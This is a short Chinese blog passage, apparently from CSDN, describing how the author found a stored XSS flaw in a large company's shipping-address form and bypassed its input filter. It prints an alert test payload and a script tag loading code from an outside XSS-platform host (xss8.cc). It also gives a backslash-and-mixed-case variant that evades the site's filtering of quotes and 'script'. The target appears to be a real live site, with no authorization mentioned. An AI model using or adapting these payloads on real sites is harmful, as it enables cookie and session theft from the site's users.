0x01 找到存在XSS的位置
没什么技巧,见到框就X,功夫不负有心人,在目标网站编辑收货地址处发现了存在XSS的地方,没想到这种大公司还会存在XSS。
使用的XSS代码:<img src=1 onerror=alert(1)
#因为优快云编辑器的原因,这里括号不能补全,使用该XSS的时候alert(1)后要加上右括号以补全前面的左括号。
0x02 构造XSS代码连接到XSS平台
XSS平台给我们的XSS代码是这样的:
</tExtArEa>'"><sCRiPt sRC=https://xss8.cc/3Ri4></sCrIpT>
直接插入的话会提示参数非法,经过多次尝试,最后发现该平台会对双引号、script字符进行识别过滤,大小写会被过滤,于是尝试插入下面的语句:
</tExtArEa>'\"><\sCRiPt sRC=https://xss8.cc/3Ri4></\sCrIpT>
这条代码比上面平台给的XSS代码的多了几个 “\”,也就是转义字符,利用转义字符可以绕过该平台的策略,因为经验不足,所以在这一步尝试了很多种办法都没能绕过,要不有的可以插入但是连不上XSS平台,要不有的就是被识别拦截。